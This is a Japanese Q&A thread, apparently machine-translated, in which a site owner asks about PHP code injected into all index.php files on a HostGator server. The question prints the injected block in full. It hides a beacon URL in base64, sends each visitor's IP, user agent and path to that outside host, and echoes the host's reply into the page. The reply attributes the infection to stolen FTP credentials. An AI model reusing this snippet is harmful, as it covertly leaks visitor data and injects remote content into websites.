1

*ウェブサイト ディレクトリ内のすべての index.php ファイルと、同じサーバー上の他のウェブサイト ディレクトリ内のすべての index.php ファイルにコードが挿入されていることに気付きました!

こんにちは、私は自分の Web サイトの 1 つで奇妙なことが起こっているのを観察しています。データベース テーブルの行が不思議なことに消えています。すぐにではなく、30 分ごとに 1 行のように、1 日を通して。とにかく、私はこれを引き起こしている原因を突き止めるために一生懸命努力してきましたが、消えた行の原因を特定することはできませんでした. そのため、MySQL データへの影響は壊滅的ではありませんでしたが、おそらく他の誰かがボットまたは何か悪意を持ってそれを行っているのではないかと疑い始めました (私は、ハッカーがデータベース全体を台無しにしたいと思うだろうと考えています)。チャンス... 30分ごとに1行を因果的に削除するだけではありません)。

そのため、サーバー上のインデックス ファイルを開いたときに、私が書いていない、理解できないコード ブロックを見つけました... 他の誰かがサーバー上の index.php ファイルを変更できたことを示しています。挿入された php コードのブロックを以下に添付します。

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
    $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
        @$stCurlHandle = curl_init( $stCurlLink ); 
}
} 
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
 {$sResult[0]=" ";
  echo $sResult; // Statistic code end
  }
curl_close($stCurlHandle); 
}
}

私は HostGator でホストしています。このコードは、データベースの行が消える原因になるのでしょうか? この挿入されたコードが何をするか、または私のウェブサイトに何ができるかを誰か知っていますか? これは XSS ですか、それとも他の種類のハックですか? どうすればこのようなことを防ぐことができますか? アドバイスをいただければ幸いです。

4

1 に答える 1

0

いいえ、これは単なる ftp パスワードの盗用です。おそらく、Windows と Total Commander を使用してコンテンツをアップロードし、アカウントのパスワードを保存しているでしょう。Windows ワークステーション上のウイルス (?) は、合法的に FTP サーバーに接続し、すべてのディレクトリの index.php にコードを追加します。ワークステーションをクリーンアップして、FTP パスワードを変更してください!

于 2013-08-27T10:55:16.127 に答える